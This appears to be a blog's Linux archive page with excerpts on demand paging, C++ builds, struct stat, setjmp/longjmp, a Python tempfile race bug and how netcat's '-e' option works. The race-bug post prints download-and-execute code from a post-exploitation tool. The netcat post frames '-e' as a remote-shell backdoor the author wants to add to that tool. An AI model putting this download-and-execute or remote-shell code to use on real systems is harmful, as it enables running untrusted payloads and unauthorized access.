Category Archives: Linux

What they don’t tell you about demand paging in school

This post details my adventures with the Linux virtual memory subsystem, and my discovery of a creative way to taunt the OOM (out of memory) killer by accumulating memory in the kernel, rather than in userspace.

Keep reading and you’ll learn:

  • Internal details of the Linux kernel’s demand paging implementation
  • How to exploit virtual memory to implement highly efficient sparse data structures
  • What page tables are and how to calculate the memory overhead incurred by them
  • A cute way to get killed by the OOM killer while appearing to consume very little memory (great for parties)

Note: Victor Michel wrote a great follow up to this post here.

Continue reading

Being pedantic about C++ compilation

Takeaways:

  • Don’t assume it’s safe to use pre-built dependencies when compiling C++ programs. You might want to build from source, especially if you can’t determine how a pre-built object was compiled, or if you want to use a different C++ standard than was used to compile it.
  • Ubuntu has public build logs which can help you determine if you can use a pre-built object, or if you should compile from source.
  • pkg-config is useful for generating the flags needed to compile a complex third-party dependency. CMake’s PkgConfig module can make it easy to integrate a dep into your build system.
  • Use CMake IMPORTED targets (e.g. BZip2::Bzip2) versus legacy variables (e.g. BZIP2_INCLUDE_DIRS and BZIP2_LIBRARIES).
Continue reading

struct stat notes

struct stat on Linux is pretty interesting

  • the struct definition in the man page is not exactly accurate
  • glibc explicitly pads the struct with unused members which is intersting. I guess to reserve space for expansion of fields
    • if you want to see the real definition, a trick you can use is writing a test program that uses a struct stat, and compiling with -E to stop after preprocessing then look in that output for the definition
  • you can look in the glibc sources and the linux sources and see that they actually have to make their struct definitions match! (i think). since kernel space is populating the struct memory and usespace is using it, they need to exactly agree on where what members are
    • you can find some snarky comments in linux about the padding, which is pretty funny. for example (arch/arm/include/uapi/asm/stat.h)
  • because the structs are explicitly padded, if you do a struct designator initialization, you CANNOT omit the designators. if you do, the padded members will be initialized instead of the fields you wanted!

How setjmp and longjmp work

Pretty recently I learned about setjmp() and longjmp(). They’re a neat pair of libc functions which allow you to save your program’s current execution context and resume it at an arbitrary point in the future (with some caveats1). If you’re wondering why this is particularly useful, to quote the manpage, one of their main use cases is “…for dealing with errors and interrupts encountered in a low-level subroutine of a program.” These functions can be used for more sophisticated error handling than simple error code return values.

I was curious how these functions worked, so I decided to take a look at musl libc’s implementation for x86. First, I’ll explain their interfaces and show an example usage program. Next, since this post isn’t aimed at the assembly wizard, I’ll cover some basics of x86 and Linux calling convention to provide some required background knowledge. Lastly, I’ll walk through the source, line by line.

Continue reading

Off to the (Python Internals) Races

This post is about an interesting race condition bug I ran into when working on a small feature improvement for poet a while ago that I thought was worth writing a blog post about.

In particular, I was improving the download-and-execute capability of poet which, if you couldn’t tell, downloads a file from the internet and executes it on the target. At the original time of writing, I didn’t know about the python tempfile module and since I recently learned about it, I wanted to integrate it into poet as it would be a significant improvement to the original implementation. The initial patch looked like this.

r = urllib2.urlopen(inp.split()[1])
with tempfile.NamedTemporaryFile() as f:
    f.write(r.read())
    os.fchmod(f.fileno(), stat.S_IRWXU)
    f.flush()  # ensure that file was actually written to disk
    sp.Popen(f.name, stdout=open(os.devnull, 'w'), stderr=sp.STDOUT)

This code downloads a file from the internet, writes it to a tempfile on disk, sets the permissions to executable, executes it in a subprocess. In testing this code, I observed some puzzling behavior: the file was never actually getting executed because it was suddenly ceasing to exist! I noticed though that when I used subprocess.call() or used .wait() on the Popen(), it would work fine, however I intentionally didn’t want the client to block while the file executed its arbitrary payload, so I couldn’t use those functions.

The fact that the execution would work when the Popen call waited for the process and didn’t work otherwise suggests that there was something going on between the time it took to execute the child and the time it took for the with block to end and delete the file, which is tempfile‘s default behavior. More specifically, the file must have been deleted at some point before the exec syscall loaded the file from disk into memory. Let’s take a look at the implementation of subprocess.Popen() to see if we can gain some more insight:

def _execute_child(self, args, executable, preexec_fn, close_fds,
                           cwd, env, universal_newlines,
                           startupinfo, creationflags, shell, to_close,
                           p2cread, p2cwrite,
                           c2pread, c2pwrite,
                           errread, errwrite):
            """Execute program (POSIX version)"""

            <snip>

            try:
                try:
                    <snip>
                    try:
                        self.pid = os.fork()
                    except:
                        if gc_was_enabled:
                            gc.enable()
                        raise
                    self._child_created = True
                    if self.pid == 0:
                        # Child
                        try:
                            # Close parent's pipe ends
                            if p2cwrite is not None:
                                os.close(p2cwrite)
                            if c2pread is not None:
                                os.close(c2pread)
                            if errread is not None:
                                os.close(errread)
                            os.close(errpipe_read)

                            # When duping fds, if there arises a situation
                            # where one of the fds is either 0, 1 or 2, it
                            # is possible that it is overwritten (#12607).
                            if c2pwrite == 0:
                                c2pwrite = os.dup(c2pwrite)
                            if errwrite == 0 or errwrite == 1:
                                errwrite = os.dup(errwrite)

                            # Dup fds for child
                            def _dup2(a, b):
                                # dup2() removes the CLOEXEC flag but
                                # we must do it ourselves if dup2()
                                # would be a no-op (issue #10806).
                                if a == b:
                                    self._set_cloexec_flag(a, False)
                                elif a is not None:
                                    os.dup2(a, b)
                            _dup2(p2cread, 0)
                            _dup2(c2pwrite, 1)
                            _dup2(errwrite, 2)

                            # Close pipe fds.  Make sure we don't close the
                            # same fd more than once, or standard fds.
                            closed = { None }
                            for fd in [p2cread, c2pwrite, errwrite]:
                                if fd not in closed and fd > 2:
                                    os.close(fd)
                                    closed.add(fd)

                            if cwd is not None:
                                os.chdir(cwd)

                            if preexec_fn:
                                preexec_fn()

                            # Close all other fds, if asked for - after
                            # preexec_fn(), which may open FDs.
                            if close_fds:
                                self._close_fds(but=errpipe_write)

                            if env is None:
                                os.execvp(executable, args)
                            else:
                                os.execvpe(executable, args, env)

                        except:
                            exc_type, exc_value, tb = sys.exc_info()
                            # Save the traceback and attach it to the exception object
                            exc_lines = traceback.format_exception(exc_type,
                                                                   exc_value,
                                                                   tb)
                            exc_value.child_traceback = ''.join(exc_lines)
                            os.write(errpipe_write, pickle.dumps(exc_value))

                        # This exitcode won't be reported to applications, so it
                        # really doesn't matter what we return.
                        os._exit(255)

                    # Parent
                    if gc_was_enabled:
                        gc.enable()
                finally:
                    # be sure the FD is closed no matter what
                    os.close(errpipe_write)

                # Wait for exec to fail or succeed; possibly raising exception
                # Exception limited to 1M
                data = _eintr_retry_call(os.read, errpipe_read, 1048576)

                <snip>

The _execute_child() function is called by the subprocess.Popen class constructor and implements child process execution. There’s a lot of code here, but key parts to notice here are the os.fork() call which creates the child process, and the relative lengths of the following if blocks. The check if self.pid == 0 contains the code for executing the child process and is significantly more involved than the code for handling the parent process.

From this, we can deduce that when the subprocess.Popen() call executes in my code, after forking, while the child is preparing to call os.execve, the parent simply returns, and immediately exits the with block. This automatically invokes the f.close() function which deletes the temp file. By the time the child calls os.execve, the file has been deleted on disk. Oops.

I fixed this by adding the delete=False argument to the NamedTemporaryFile constructor to suppress the auto-delete functionality. Of course this means that the downloaded files will have to be cleaned up manually, but this allows the client to not block when executing the file and have the code still be pretty clean.

Main takeaway here: don’t try to Popen a NamedTemporaryFile as the last statement in the tempfile’s with block.

Netcat “-e” Analysis

As I mentioned in a previous post, netcat has this cool -e parameter that lets you specify an executable to essentially turn into a network service, that is, a process that can send and receive data over the network. This option is option is particularly useful when called with a shell (/bin/sh, /bin/bash, etc) as a parameter because this creates a poor man’s remote shell connection, and can also be used as a backdoor into the system. As part of the post-exploitation tool I’m working on, I wanted to try to add this type of remote shell feature, but it wasn’t immediately obvious to me how something like this would be done, so I decided to dive into netcat’s source and see if I could understand how it was implemented.

Not knowing where to start, I first tried searching the file for "-e" which brought me to:

case 'e':           /* prog to exec */
  if (opt_exec)
ncprint(NCPRINT_ERROR | NCPRINT_EXIT,
    _("Cannot specify `-e' option double"));
  opt_exec = strdup(optarg);
  break;

This snippet is using the GNU argument parsing library, getopt, to check if "-e" is set, and if not, setting the global char* variable opt_exec to the parameter. Then I tried searching for opt_exec, bringing me to:

if (netcat_mode == NETCAT_LISTEN) {
  if (opt_exec) {
ncprint(NCPRINT_VERB2, _("Passing control to the specified program"));
ncexec(&listen_sock);       /* this won't return */
  }
  core_readwrite(&listen_sock, &stdio_sock);
  debug_dv(("Listen: EXIT"));
}

This code checks if opt_exec is set, and if so calling ncexec().

/* Execute an external file making its stdin/stdout/stderr the actual socket */

static void ncexec(nc_sock_t *ncsock)
{
  int saved_stderr;
  char *p;
  assert(ncsock && (ncsock->fd >= 0));

  /* save the stderr fd because we may need it later */
  saved_stderr = dup(STDERR_FILENO);

  /* duplicate the socket for the child program */
  dup2(ncsock->fd, STDIN_FILENO);   /* the precise order of fiddlage */
  close(ncsock->fd);            /* is apparently crucial; this is */
  dup2(STDIN_FILENO, STDOUT_FILENO);    /* swiped directly out of "inetd". */
  dup2(STDIN_FILENO, STDERR_FILENO);    /* also duplicate the stderr channel */

  /* change the label for the executed program */
  if ((p = strrchr(opt_exec, '/')))
    p++;            /* shorter argv[0] */
  else
    p = opt_exec;

  /* replace this process with the new one */
#ifndef USE_OLD_COMPAT
  execl("/bin/sh", p, "-c", opt_exec, NULL);
#else
  execl(opt_exec, p, NULL);
#endif
  dup2(saved_stderr, STDERR_FILENO);
  ncprint(NCPRINT_ERROR | NCPRINT_EXIT, _("Couldn't execute %s: %s"),
      opt_exec, strerror(errno));
}               /* end of ncexec() */ 

Here, on lines 13-16 is how the "-e" parameter really works. dup2() accepts two file descriptors and after deallocating the second one (as if close() was called on it), the second one’s value is set to the first. So in this case on line 13, the child process’s stdin is being set to the file descriptor for the network socket netcat opened. This means that the child process will view any data received over the network will as input data and will act accordingly. Then on lines 15 and 16, the stdout and stderr descriptors are also set to the socket, which will cause any output the program has to be directed over the network. As far as line 14 goes, I’m not sure why the original socket file descriptor has to be closed at that exact point (and based on the comments, it seems like the netcat author wasn’t sure either).

The main point is this file descriptor swapping has essentially converted our specified program into a network service; all the input and output will be piped over the network, and at this point the child process can be executed. The child will replace the netcat process and will also inherit the newly set socket file descriptors. Note that on lines 30 and 31 there’s some error handling code that resets the original stderr for the netcat process and prints out an error message. This is because the code should actually never get to this point in execution due to the execl() call and if it does, there was an error executing the child.

I wrote this little python program to see if I understood things correctly:

#!/usr/bin/env python

import sys

inp = sys.stdin.read(5)
if inp == 'hello':
    sys.stdout.write('hi\n')
else:
    sys.stdout.write('bye\n')

It simply reads 5 bytes from stdin and prints ‘hi’ if those 5 bytes were ‘hello’ otherwise printing ‘bye’.

Using this program as the -e parameter results in this:

$ netcat -e /tmp/test.py -lp 8080 &
[1] 19021
$ echo asdfg | netcat 127.0.0.1 8080
bye
[1]+  Done                    netcat -e /tmp/blah.py -lp 8080
$ netcat -e /tmp/test.py -lp 8080 &
[1] 19024
$ echo hello | netcat 127.0.0.1 8080
hi
[1]+  Done                    netcat -e /tmp/blah.py -lp 8080

We can see the "server" launched in the background. The echo command sends data into netcat’s stdin, which is being sent over the network, handled by the python script, which sends back its response, which gets printed. Then we can see that the server exits since the netcat process has been replaced by the script, and the script has exited.